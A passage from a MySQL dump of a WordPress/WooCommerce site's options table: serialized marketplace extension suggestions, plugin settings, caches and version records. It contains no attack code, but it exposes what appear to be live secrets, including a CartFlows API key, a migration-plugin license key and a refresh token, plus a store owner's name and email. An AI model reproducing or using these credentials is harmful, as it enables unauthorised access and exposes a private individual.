More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/mailchimp-woocommerce-memberships/\";}i:3;a:9:{s:4:\"slug\";s:19:\"product-edit-addons\";s:7:\"product\";s:26:\"woocommerce-product-addons\";s:14:\"show-if-active\";a:2:{i:0;s:25:\"woocommerce-subscriptions\";i:1;s:20:\"woocommerce-bookings\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:107:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/product-add-ons.svg\";s:5:\"title\";s:15:\"Product Add-Ons\";s:4:\"copy\";s:93:\"Offer add-ons like gift wrapping, special messages or other special options for your products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-add-ons/\";}i:4;a:9:{s:4:\"slug\";s:46:\"product-edit-woocommerce-subscriptions-gifting\";s:7:\"product\";s:33:\"woocommerce-subscriptions-gifting\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:117:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/gifting-for-subscriptions.svg\";s:5:\"title\";s:25:\"Gifting for Subscriptions\";s:4:\"copy\";s:70:\"Let customers buy subscriptions for others - they\'re the ultimate gift\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/woocommerce-subscriptions-gifting/\";}i:5;a:9:{s:4:\"slug\";s:42:\"product-edit-teams-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-for-teams\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:113:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/teams-for-memberships.svg\";s:5:\"title\";s:21:\"Teams for Memberships\";s:4:\"copy\";s:123:\"Adds B2B functionality to WooCommerce Memberships, allowing sites to sell team, group, corporate, or family member accounts\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/teams-woocommerce-memberships/\";}i:6;a:8:{s:4:\"slug\";s:29:\"product-edit-variation-images\";s:7:\"product\";s:39:\"woocommerce-additional-variation-images\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:119:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/additional-variation-images.svg\";s:5:\"title\";s:27:\"Additional Variation Images\";s:4:\"copy\";s:72:\"Showcase your products in the best light with a image for each variation\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:73:\"https://woocommerce.com/products/woocommerce-additional-variation-images/\";}i:7;a:9:{s:4:\"slug\";s:47:\"product-edit-woocommerce-subscription-downloads\";s:7:\"product\";s:34:\"woocommerce-subscription-downloads\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:114:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/subscription-downloads.svg\";s:5:\"title\";s:22:\"Subscription Downloads\";s:4:\"copy\";s:57:\"Give customers special downloads with their subscriptions\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:68:\"https://woocommerce.com/products/woocommerce-subscription-downloads/\";}i:8;a:8:{s:4:\"slug\";s:31:\"product-edit-min-max-quantities\";s:7:\"product\";s:30:\"woocommerce-min-max-quantities\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/min-max-quantities.svg\";s:5:\"title\";s:18:\"Min/Max Quantities\";s:4:\"copy\";s:81:\"Specify minimum and maximum allowed product quantities for orders to be completed\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/min-max-quantities/\";}i:9;a:8:{s:4:\"slug\";s:28:\"product-edit-name-your-price\";s:7:\"product\";s:27:\"woocommerce-name-your-price\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:107:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/name-your-price.svg\";s:5:\"title\";s:15:\"Name Your Price\";s:4:\"copy\";s:70:\"Let customers pay what they want - useful for donations, tips and more\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/name-your-price/\";}i:10;a:8:{s:4:\"slug\";s:42:\"product-edit-woocommerce-one-page-checkout\";s:7:\"product\";s:29:\"woocommerce-one-page-checkout\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:109:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/one-page-checkout.svg\";s:5:\"title\";s:17:\"One Page Checkout\";s:4:\"copy\";s:92:\"Don\'t make customers click around - let them choose products, checkout & pay all on one page\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/woocommerce-one-page-checkout/\";}i:11;a:4:{s:4:\"slug\";s:19:\"orders-empty-header\";s:7:\"context\";s:24:\"orders-list-empty-header\";s:5:\"title\";s:20:\"Tools for your store\";s:13:\"allow-dismiss\";b:0;}i:12;a:6:{s:4:\"slug\";s:30:\"orders-empty-footer-browse-all\";s:7:\"context\";s:24:\"orders-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:13;a:8:{s:4:\"slug\";s:19:\"orders-empty-zapier\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:18:\"woocommerce-zapier\";s:4:\"icon\";s:98:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/zapier.svg\";s:5:\"title\";s:6:\"Zapier\";s:4:\"copy\";s:88:\"Save time and increase productivity by connecting your store to more than 1000+ services\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/woocommerce-zapier/\";}i:14;a:8:{s:4:\"slug\";s:30:\"orders-empty-shipment-tracking\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:29:\"woocommerce-shipment-tracking\";s:4:\"icon\";s:109:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/shipment-tracking.svg\";s:5:\"title\";s:17:\"Shipment Tracking\";s:4:\"copy\";s:86:\"Let customers know when their orders will arrive by adding shipment tracking to emails\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:51:\"https://woocommerce.com/products/shipment-tracking/\";}i:15;a:8:{s:4:\"slug\";s:32:\"orders-empty-table-rate-shipping\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:31:\"woocommerce-table-rate-shipping\";s:4:\"icon\";s:111:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/table-rate-shipping.svg\";s:5:\"title\";s:19:\"Table Rate Shipping\";s:4:\"copy\";s:122:\"Advanced, flexible shipping. Define multiple shipping rates based on location, price, weight, shipping class or item count\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/table-rate-shipping/\";}i:16;a:8:{s:4:\"slug\";s:40:\"orders-empty-shipping-carrier-extensions\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:4:\"icon\";s:119:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/shipping-carrier-extensions.svg\";s:5:\"title\";s:27:\"Shipping Carrier Extensions\";s:4:\"copy\";s:116:\"Show live rates from FedEx, UPS, USPS and more directly on your store - never under or overcharge for shipping again\";s:11:\"button-text\";s:13:\"Find Carriers\";s:8:\"promoted\";s:26:\"category-shipping-carriers\";s:3:\"url\";s:99:\"https://woocommerce.com/product-category/woocommerce-extensions/shipping-methods/shipping-carriers/\";}i:17;a:8:{s:4:\"slug\";s:32:\"orders-empty-google-product-feed\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-product-feeds\";s:4:\"icon\";s:111:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/google-product-feed.svg\";s:5:\"title\";s:19:\"Google Product Feed\";s:4:\"copy\";s:76:\"Increase sales by letting customers find you when they\'re shopping on Google\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/google-product-feed/\";}i:18;a:4:{s:4:\"slug\";s:35:\"products-empty-header-product-types\";s:7:\"context\";s:26:\"products-list-empty-header\";s:5:\"title\";s:23:\"Other types of products\";s:13:\"allow-dismiss\";b:0;}i:19;a:6:{s:4:\"slug\";s:32:\"products-empty-footer-browse-all\";s:7:\"context\";s:26:\"products-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:20;a:8:{s:4:\"slug\";s:30:\"products-empty-product-vendors\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-vendors\";s:4:\"icon\";s:107:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/product-vendors.svg\";s:5:\"title\";s:15:\"Product Vendors\";s:4:\"copy\";s:47:\"Turn your store into a multi-vendor marketplace\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-vendors/\";}i:21;a:8:{s:4:\"slug\";s:26:\"products-empty-memberships\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:23:\"woocommerce-memberships\";s:4:\"icon\";s:103:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/memberships.svg\";s:5:\"title\";s:11:\"Memberships\";s:4:\"copy\";s:76:\"Give members access to restricted content or products, for a fee or for free\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:57:\"https://woocommerce.com/products/woocommerce-memberships/\";}i:22;a:9:{s:4:\"slug\";s:35:\"products-empty-woocommerce-deposits\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-deposits\";s:14:\"show-if-active\";a:1:{i:0;s:20:\"woocommerce-bookings\";}s:4:\"icon\";s:100:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/deposits.svg\";s:5:\"title\";s:8:\"Deposits\";s:4:\"copy\";s:75:\"Make it easier for customers to pay by offering a deposit or a payment plan\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-deposits/\";}i:23;a:8:{s:4:\"slug\";s:40:\"products-empty-woocommerce-subscriptions\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-subscriptions\";s:4:\"icon\";s:105:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/subscriptions.svg\";s:5:\"title\";s:13:\"Subscriptions\";s:4:\"copy\";s:97:\"Let customers subscribe to your products or services and pay on a weekly, monthly or annual basis\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:59:\"https://woocommerce.com/products/woocommerce-subscriptions/\";}i:24;a:8:{s:4:\"slug\";s:35:\"products-empty-woocommerce-bookings\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-bookings\";s:4:\"icon\";s:100:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/bookings.svg\";s:5:\"title\";s:8:\"Bookings\";s:4:\"copy\";s:99:\"Allow customers to book appointments, make reservations or rent equipment without leaving your site\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-bookings/\";}i:25;a:8:{s:4:\"slug\";s:30:\"products-empty-product-bundles\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-bundles\";s:4:\"icon\";s:107:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/product-bundles.svg\";s:5:\"title\";s:15:\"Product Bundles\";s:4:\"copy\";s:49:\"Offer customizable bundles and assembled products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-bundles/\";}}s:7:\"updated\";i:1566828160;}','no'),(425642,'seed_csp4_initial_version','0','no'),(425643,'seed_csp4_version','5.0.25','no'),(425667,'wc_silkwave_aco_mode','paid','yes'),(454047,'woocommerce_version','3.7.0','yes'),(430014,'product_cat_children','a:0:{}','yes'),(456120,'woocommerce_db_version','3.7.0','yes'),(430456,'wp-optimize-dismiss_dash_notice_until','1591012826','yes'),(430473,'wc_admin_install_timestamp','1566475309','yes'),(430474,'wc_admin_last_orders_milestone','10','yes'),(430489,'woocommerce_excluded_report_order_statuses','a:3:{i:0;s:7:\"pending\";i:1;s:9:\"cancelled\";i:2;s:6:\"failed\";}','yes'),(430490,'woocommerce_actionable_order_statuses','a:2:{i:0;s:10:\"processing\";i:1;s:7:\"on-hold\";}','yes'),(430491,'wc_admin_import_customers_count','1','yes'),(430492,'wc_admin_import_orders_count','7','yes'),(430493,'wc_admin_import_customers_total','1','yes'),(430494,'wc_admin_import_orders_total','7','yes'),(430495,'wc_admin_imported_from_date','-1','yes'),(431063,'woocommerce_sales_record_date','2019-08-02','yes'),(431064,'woocommerce_sales_record_amount','8873','yes'),(433449,'theme_mods_twentynineteen','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:6:\"menu-1\";i:14;s:6:\"footer\";i:15;}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1559833257;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:8:\"search-4\";}s:9:\"sidebar-1\";a:4:{i:0;s:25:\"woocommerce_widget_cart-2\";i:1;s:28:\"woocommerce_product_search-2\";i:2;s:38:\"woocommerce_recently_viewed_products-2\";i:3;s:32:\"woocommerce_top_rated_products-2\";}}}}','yes'),(433798,'et_support_center_installed','true','yes'),(434142,'wp-optimize-compression_server','resmushit','yes'),(434143,'wp-optimize-image_quality','very_good','yes'),(434144,'wp-optimize-back_up_original','1','yes'),(434525,'ai1wmue_plugin_key','38ff32c3-706a-468c-8d18-b3a3f9960085','yes'),(435412,'code_snippets_version','2.13.3','yes'),(435417,'code_snippets_settings','a:3:{s:7:\"general\";a:6:{s:19:\"activate_by_default\";b:1;s:21:\"snippet_scope_enabled\";b:1;s:11:\"enable_tags\";b:1;s:18:\"enable_description\";b:1;s:13:\"disable_prism\";b:0;s:18:\"complete_uninstall\";b:0;}s:18:\"description_editor\";a:3:{s:4:\"rows\";i:5;s:12:\"use_full_mce\";b:0;s:13:\"media_buttons\";b:0;}s:6:\"editor\";a:8:{s:5:\"theme\";s:7:\"default\";s:16:\"indent_with_tabs\";b:1;s:8:\"tab_size\";i:4;s:11:\"indent_unit\";i:4;s:10:\"wrap_lines\";b:1;s:12:\"line_numbers\";b:1;s:19:\"auto_close_brackets\";b:1;s:27:\"highlight_selection_matches\";b:1;}}','yes'),(435443,'wcf_ca_status','on','yes'),(435444,'wcf_ca_gdpr_status','off','yes'),(435445,'wcf_ca_coupon_code_status','off','yes'),(435446,'wcf_ca_zapier_tracking_status','off','yes'),(435447,'wcf_ca_cut_off_time','15','yes'),(435448,'wcf_ca_from_name','Zainub Mahomed','yes'),(435449,'wcf_ca_from_email','info@companyregistrations.online','yes'),(435450,'wcf_ca_reply_email','info@companyregistrations.online','yes'),(435451,'wcf_ca_discount_type','percent','yes'),(435452,'wcf_ca_coupon_amount','10','yes'),(435453,'wcf_ca_zapier_cart_abandoned_webhook','','yes'),(435454,'wcf_ca_gdpr_message','Your email & cart are saved so we can send email reminders about this order.','yes'),(435455,'wcf_ca_coupon_expiry','0','yes'),(435456,'wcf_ca_coupon_expiry_unit','hours','yes'),(435462,'wcf_ca_version','1.1.7','yes'),(435467,'cartflows-version','1.2.5','yes'),(435469,'_cartflows_common','a:3:{s:17:\"disallow_indexing\";s:7:\"disable\";s:15:\"global_checkout\";s:0:\"\";s:20:\"default_page_builder\";s:4:\"divi\";}','yes'),(439609,'_mm_refresh_token','5cfa5fad-1998-4701-9794-0aeb0a141f3b','yes'),(454056,'wc_admin_version','0.17.0','yes'),(440574,'mm_cache_settings','a:2:{s:4:\"page\";s:7:\"enabled\";s:7:\"browser\";s:7:\"enabled\";}','yes'),(440575,'epc_filetype_expirations','a:9:{s:9:\"image/jpg\";s:7:\"6 hours\";s:10:\"image/jpeg\";s:7:\"6 hours\";s:9:\"image/gif\";s:7:\"6 hours\";s:9:\"image/png\";s:7:\"6 hours\";s:8:\"text/css\";s:7:\"6 hours\";s:15:\"application/pdf\";s:6:\"1 week\";s:15:\"text/javascript\";s:7:\"6 hours\";s:9:\"text/html\";s:9:\"5 minutes\";s:7:\"default\";s:7:\"3 hours\";}','yes'),(440576,'endurance_cache_level','2','yes'),(449764,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:65:\"https://downloads.wordpress.org/release/en_GB/wordpress-5.2.2.zip\";s:6:\"locale\";s:5:\"en_GB\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:65:\"https://downloads.wordpress.org/release/en_GB/wordpress-5.2.2.zip\";s:10:\"no_content\";b:0;s:11:\"new_bundled\";b:0;s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.2.2\";s:7:\"version\";s:5:\"5.2.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1567020054;s:15:\"version_checked\";s:5:\"5.2.2\";s:12:\"translations\";a:0:{}}','no'),(441137,'wcf_setup_skipped','1','yes'),(448411,'rsssl_mixed_content_fixer_detected_dismissed','1','yes'),(441297,'wc_am_client_cartflows_instance','yMcUBym4Vt08','yes'),(441298,'wc_am_client_cartflows_deactivate_checkbox','on','yes'),(441299,'wc_am_client_cartflows_activated','Activated','yes'),(441300,'cartflows_database_tables_created','yes','yes'),(444908,'rocket_lazyload_options','a:2:{s:6:\"images\";s:1:\"1\";s:7:\"iframes\";s:1:\"1\";}','yes'),(445116,'wp-optimize-is_gzip_compression_enabled','1','yes'),(445114,'wp-optimize-dismiss_season','1595675159','yes'),(444920,'spai_settings_excluded_paths','regex:/\\/\\/([^\\/]*\\.|)gravatar.com\\//','yes'),(444921,'spai_settings_api_url','https://cdn.shortpixel.ai/spai','yes'),(444922,'spai_settings_compress_level','1','yes'),(444923,'spai_settings_remove_exif','','yes'),(444932,'spai_settings_excluded_selectors','','yes'),(444933,'spai_settings_type','0','yes'),(444934,'spai_settings_webp','1','yes'),(444935,'spai_settings_fadein','1','yes'),(453889,'_site_transient_browser_fb5aee71803d8bd8a4d749f5f6fdab81','a:10:{s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"69.0\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:24:\"https://www.firefox.com/\";s:7:\"img_src\";s:44:\"http://s.w.org/images/browsers/firefox.png?1\";s:11:\"img_src_ssl\";s:45:\"https://s.w.org/images/browsers/firefox.png?1\";s:15:\"current_version\";s:2:\"56\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(453888,'_site_transient_timeout_browser_fb5aee71803d8bd8a4d749f5f6fdab81','1567068636','no'),(451880,'_transient_timeout_wc_product_loop_9f8f6b0c60fb19dd51b46b96a61566c5','1568453267','no'),(451881,'_transient_wc_product_loop_9f8f6b0c60fb19dd51b46b96a61566c5','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:12:{i:0;i:70;i:1;i:28088;i:2;i:79;i:3;i:74;i:4;i:28092;i:5;i:67;i:6;i:69;i:7;i:68;i:8;i:65;i:9;i:72;i:10;i:31327;i:11;i:28090;}s:5:\"total\";i:12;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(451882,'_transient_timeout_wc_product_loop_782763041ae08b5cc131ee3f9c3aee2d','1568453273','no'),(451883,'_transient_wc_product_loop_782763041ae08b5cc131ee3f9c3aee2d','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:12:{i:0;i:70;i:1;i:28088;i:2;i:79;i:3;i:74;i:4;i:28092;i:5;i:67;i:6;i:69;i:7;i:68;i:8;i:65;i:9;i:72;i:10;i:31327;i:11;i:28090;}s:5:\"total\";i:12;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(451884,'_transient_timeout_wc_product_loop_bbfe7f88746730435c1864e534c7bff6','1568453280','no'),(451885,'_transient_wc_product_loop_bbfe7f88746730435c1864e534c7bff6','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:6:{i:0;i:74;i:1;i:78;i:2;i:75;i:3;i:76;i:4;i:237;i:5;i:77;}s:5:\"total\";i:6;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(451886,'_transient_timeout_wc_product_loop_e517dc0c86aa65e8421b33de2ca3dd2b','1568453297','no'),(451887,'_transient_wc_product_loop_e517dc0c86aa65e8421b33de2ca3dd2b','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:9:{i:0;i:74;i:1;i:78;i:2;i:75;i:3;i:76;i:4;i:237;i:5;i:77;i:6;i:80;i:7;i:29583;i:8;i:29681;}s:5:\"total\";i:9;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(451888,'_transient_timeout_wc_product_loop_bb61a765ef0dcd51f3523ae10aee08a2','1568453299','no'),(451889,'_transient_wc_product_loop_bb61a765ef0dcd51f3523ae10aee08a2','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:12:{i:0;i:74;i:1;i:78;i:2;i:30118;i:3;i:64;i:4;i:28;i:5;i:62;i:6;i:75;i:7;i:76;i:8;i:237;i:9;i:77;i:10;i:80;i:11;i:29583;}s:5:\"total\";i:12;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(451891,'_transient_timeout_wc_product_loop_97a751dcf17a79d46c96ecdca00358b2','1568453308','no'),(451892,'_transient_wc_product_loop_97a751dcf17a79d46c96ecdca00358b2','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:12:{i:0;i:28088;i:1;i:74;i:2;i:28092;i:3;i:28090;i:4;i:78;i:5;i:30118;i:6;i:64;i:7;i:28;i:8;i:62;i:9;i:75;i:10;i:76;i:11;i:28091;}s:5:\"total\";i:12;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(451893,'_transient_timeout_wc_product_loop_3077b41a4068a15ccc655dc61e84b7f8','1568453327','no'),(451894,'_transient_wc_product_loop_3077b41a4068a15ccc655dc61e84b7f8','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:6:{i:0;i:28088;i:1;i:74;i:2;i:28092;i:3;i:28090;i:4;i:78;i:5;i:30118;}s:5:\"total\";i:6;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:6;s:12:\"current_page\";i:1;}}','no'),(451895,'_transient_timeout_wc_product_loop_2ea6bf93deb426bda7bd63f1fc5c0af6','1568453335','no'),(451896,'_transient_wc_product_loop_2ea6bf93deb426bda7bd63f1fc5c0af6','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:6:{i:0;i:28088;i:1;i:74;i:2;i:28092;i:3;i:28090;i:4;i:78;i:5;i:30118;}s:5:\"total\";i:6;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:6;s:12:\"current_page\";i:1;}}','no'),(451902,'_transient_timeout_wc_product_loop_80b46d1bf48fa0d5a50f8732dd5bdeb3','1568804052','no'),(451900,'_transient_timeout_wc_product_loop_de09d9cae5bc07172cc817365d0bbfdf','1568453450','no'),(451901,'_transient_wc_product_loop_de09d9cae5bc07172cc817365d0bbfdf','a:2:{s:7:\"version\";s:10:\"1565860568\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:6:{i:0;i:74;i:1;i:78;i:2;i:30118;i:3;i:64;i:4;i:28;i:5;i:62;}s:5:\"total\";i:6;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:6;s:12:\"current_page\";i:1;}}','no'),(451903,'_transient_wc_product_loop_80b46d1bf48fa0d5a50f8732dd5bdeb3','a:2:{s:7:\"version\";s:10:\"1566211622\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:6:{i:0;i:74;i:1;i:78;i:2;i:30118;i:3;i:64;i:4;i:28;i:5;i:62;}s:5:\"total\";i:6;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:6;s:12:\"current_page\";i:1;}}','no'),(451904,'_transient_timeout_wc_product_loop_6c0c3f91beb4f25a3f97932925ac5b79','1568454204','no'),(451905,'_transient_wc_product_loop_6c0c3f91beb4f25a3f97932925ac5b79','a:2:{s:7:\"version\";s:10:\"1565862151\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:4:{i:0;i:74;i:1;i:78;i:2;i:30118;i:3;i:64;}s:5:\"total\";i:4;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:4;s:12:\"current_page\";i:1;}}','no'),(440823,'template','Divi','yes'),(440824,'stylesheet','Divi','yes'),(440882,'_site_transient_et_update_themes','O:8:\"stdClass\":1:{s:12:\"last_checked\";i:1566890659;}','no'),(440833,'_transient_woocommerce_webhook_ids_status_active','a:6:{i:0;i:6;i:1;i:5;i:2;i:4;i:3;i:3;i:4;i:2;i:5;i:1;}','yes'),(440862,'_transient_timeout_wc_product_loop_c33e882132a6d2c7ad60c0e159d4c7c9','1569491766','no'),(440863,'_transient_wc_product_loop_c33e882132a6d2c7ad60c0e159d4c7c9','a:2:{s:7:\"version\";s:10:\"1566897922\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:9:{i:0;i:28;i:1;i:70;i:2;i:62;i:3;i:29583;i:4;i:79;i:5;i:64;i:6;i:75;i:7;i:80;i:8;i:78;}s:5:\"total\";i:9;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:9;s:12:\"current_page\";i:1;}}','no'),(440838,'_transient_product_query-transient-version','1566901531','yes'),(441151,'wp_page_for_privacy_policy','295','yes'),(441317,'_transient_timeout_wc_customer_bought_product_eccbc87e4b5ce2fe28308fd9f2a7baf3','1569400343','no'),(441318,'_transient_wc_customer_bought_product_eccbc87e4b5ce2fe28308fd9f2a7baf3','a:2:{s:7:\"version\";s:10:\"1566653485\";s:5:\"value\";a:6:{i:0;i:28;i:1;i:28;i:2;i:62;i:3;i:64;i:4;i:31327;i:5;i:28;}}','no'),(441305,'cartflows-pro-version','1.2.1','yes'),(441307,'wc_am_client_cartflows_api_key','a:1:{s:7:\"api_key\";s:40:\"c511cdeb1fb98aa5f413bf406e1f97c625fa1548\";}','yes'),(441308,'wc_am_client_cartflows','a:1:{s:30:\"wc_am_client_cartflows_api_key\";s:40:\"c511cdeb1fb98aa5f413bf406e1f97c625fa1548\";}','yes'),(440891,'_site_transient_et_update_all_plugins','O:8:\"stdClass\":1:{s:12:\"last_checked\";i:1566903870;}','no'),(441040,'_transient_wc_customer_bought_product_c4ca4238a0b923820dcc509a6f75849b','a:2:{s:7:\"version\";s:10:\"1566653485\";s:5:\"value\";a:2:{i:0;i:80;i:1;i:80;}}','no'),(441086,'_transient_timeout_wc_product_loop_1c20c5d30506db02e91ba219aa806f3b','1568828148','no'),(441087,'_transient_wc_product_loop_1c20c5d30506db02e91ba219aa806f3b','a:2:{s:7:\"version\";s:10:\"1566234180\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:4:{i:0;i:28088;i:1;i:28092;i:2;i:28090;i:3;i:28091;}s:5:\"total\";i:4;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(441038,'_transient_orders-transient-version','1566653485','yes'),(441039,'_transient_timeout_wc_customer_bought_product_c4ca4238a0b923820dcc509a6f75849b','1569420498','no'),(440894,'woo_multi_currency_params','a:26:{s:6:\"enable\";s:1:\"1\";s:18:\"enable_fixed_price\";s:1:\"1\";s:14:\"price_switcher\";s:1:\"0\";s:15:\"currency_hidden\";a:2:{